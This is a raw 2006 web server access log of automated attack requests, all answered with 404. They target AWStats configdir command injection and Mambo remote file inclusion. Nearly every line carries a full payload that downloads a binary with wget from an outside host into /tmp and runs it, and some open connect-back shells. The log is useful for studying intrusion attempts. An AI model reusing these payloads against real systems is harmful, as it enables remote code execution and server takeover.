200.27.221.5 - - [16/Jan/2006:20:53:45 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

200.27.221.5 - - [16/Jan/2006:20:53:46 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

200.27.221.5 - - [16/Jan/2006:20:53:48 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

200.27.221.5 - - [16/Jan/2006:20:53:49 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 270

200.27.221.5 - - [16/Jan/2006:20:53:51 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 269

200.27.221.5 - - [16/Jan/2006:20:53:52 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 276

200.27.221.5 - - [16/Jan/2006:20:53:53 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 274

200.27.221.5 - - [16/Jan/2006:20:53:55 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 280

193.19.219.217 - - [17/Jan/2006:03:57:27 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 404 278

213.225.65.133 - - [18/Jan/2006:02:56:04 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20213%2e225%2e65%2e133%2fcback%3bchmod%20%2bx%20cback%3b%2e%2fcback%20213%2e225%2e65%2e133%2053;echo%20YYY;echo|  HTTP/1.1" 404 278

213.225.65.133 - - [18/Jan/2006:02:56:06 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20213%2e225%2e65%2e133%2fcback%3bchmod%20%2bx%20cback%3b%2e%2fcback%20213%2e225%2e65%2e133%2053;echo%20YYY;echo|  HTTP/1.1" 404 278

213.225.65.133 - - [18/Jan/2006:02:56:07 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20213%2e225%2e65%2e133%2fcback%3bchmod%20%2bx%20cback%3b%2e%2fcback%20213%2e225%2e65%2e133%2053;echo%20YYY;echo|  HTTP/1.1" 404 286

204.83.56.144 - - [18/Jan/2006:12:46:18 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 278

204.83.56.144 - - [18/Jan/2006:12:46:19 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 278

204.83.56.144 - - [18/Jan/2006:12:46:21 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 286

195.28.196.79 - - [18/Jan/2006:20:16:25 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.28.196.79 - - [18/Jan/2006:20:16:26 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.28.196.79 - - [18/Jan/2006:20:16:28 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

69.13.36.242 - - [18/Jan/2006:23:23:47 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 278

69.13.36.242 - - [18/Jan/2006:23:23:49 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 278

69.13.36.242 - - [18/Jan/2006:23:23:50 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 286

67.18.147.22 - - [19/Jan/2006:01:50:21 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 270

67.18.147.22 - - [19/Jan/2006:01:50:22 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 269

67.18.147.22 - - [19/Jan/2006:01:50:23 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 276

67.18.147.22 - - [19/Jan/2006:01:50:25 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 274

61.19.38.130 - - [19/Jan/2006:03:30:07 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

61.19.38.130 - - [19/Jan/2006:03:30:09 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

61.19.38.130 - - [19/Jan/2006:03:30:10 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

218.232.109.223 - - [19/Jan/2006:09:08:18 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

218.232.109.223 - - [19/Jan/2006:09:08:23 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

218.232.109.223 - - [19/Jan/2006:09:08:24 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

67.18.147.22 - - [19/Jan/2006:09:20:34 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 270

67.18.147.22 - - [19/Jan/2006:09:20:35 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 269

67.18.147.22 - - [19/Jan/2006:09:20:36 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 276

67.18.147.22 - - [19/Jan/2006:09:20:37 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 274

163.30.76.4 - - [20/Jan/2006:07:28:47 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

163.30.76.4 - - [20/Jan/2006:07:28:48 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

163.30.76.4 - - [20/Jan/2006:07:28:49 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

211.131.218.107 - - [20/Jan/2006:10:50:12 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

211.131.218.107 - - [20/Jan/2006:10:50:13 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

211.131.218.107 - - [20/Jan/2006:10:50:14 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

213.221.136.26 - - [21/Jan/2006:00:14:16 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

213.221.136.26 - - [21/Jan/2006:00:14:18 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

213.221.136.26 - - [21/Jan/2006:00:14:20 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

82.127.23.55 - - [21/Jan/2006:15:23:50 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

82.127.23.55 - - [21/Jan/2006:15:23:52 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

82.127.23.55 - - [21/Jan/2006:15:23:54 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

80.124.149.170 - - [22/Jan/2006:15:03:23 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

80.124.149.170 - - [22/Jan/2006:15:03:24 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

80.124.149.170 - - [22/Jan/2006:15:03:25 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

66.221.25.1 - - [22/Jan/2006:16:27:48 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

66.221.25.1 - - [22/Jan/2006:16:27:49 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

66.221.25.1 - - [22/Jan/2006:16:27:51 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

81.56.225.221 - - [23/Jan/2006:15:06:56 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

81.56.225.221 - - [23/Jan/2006:15:06:57 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

81.56.225.221 - - [23/Jan/2006:15:06:58 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

62.212.120.109 - - [24/Jan/2006:17:16:20 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

62.212.120.109 - - [24/Jan/2006:17:16:25 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

62.212.120.109 - - [24/Jan/2006:17:16:27 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

209.250.116.251 - - [24/Jan/2006:22:36:42 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 270

209.250.116.251 - - [24/Jan/2006:22:36:43 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 269

209.250.116.251 - - [24/Jan/2006:22:36:44 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 276

209.250.116.251 - - [24/Jan/2006:22:36:46 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 274

168.243.8.32 - - [25/Jan/2006:04:48:29 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

168.243.8.32 - - [25/Jan/2006:04:48:30 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

168.243.8.32 - - [25/Jan/2006:04:48:31 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

61.178.21.180 - - [26/Jan/2006:02:19:41 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

61.178.21.180 - - [26/Jan/2006:02:19:42 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

61.178.21.180 - - [26/Jan/2006:02:19:43 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

218.232.109.223 - - [28/Jan/2006:09:22:06 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

218.232.109.223 - - [28/Jan/2006:09:22:07 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

218.232.109.223 - - [28/Jan/2006:09:22:08 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

220.175.8.18 - - [28/Jan/2006:12:17:33 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

220.175.8.18 - - [28/Jan/2006:12:17:34 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

80.55.222.242 - - [30/Jan/2006:01:29:13 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

80.55.222.242 - - [30/Jan/2006:01:29:15 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

80.55.222.242 - - [30/Jan/2006:01:29:28 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

67.38.15.199 - - [30/Jan/2006:05:32:39 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

67.38.15.199 - - [30/Jan/2006:05:32:40 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

67.38.15.199 - - [30/Jan/2006:05:32:44 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

212.55.131.187 - - [01/Feb/2006:03:46:37 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

212.55.131.187 - - [01/Feb/2006:03:46:42 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

212.55.131.187 - - [01/Feb/2006:03:46:43 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

203.140.30.86 - - [04/Feb/2006:02:40:52 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

203.140.30.86 - - [04/Feb/2006:02:40:53 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

203.140.30.86 - - [04/Feb/2006:02:40:55 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

218.200.122.35 - - [06/Feb/2006:17:02:42 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

218.200.122.35 - - [06/Feb/2006:17:02:44 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

218.200.122.35 - - [06/Feb/2006:17:02:45 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

216.72.4.139 - - [07/Feb/2006:20:31:43 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

216.72.4.139 - - [07/Feb/2006:20:31:45 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

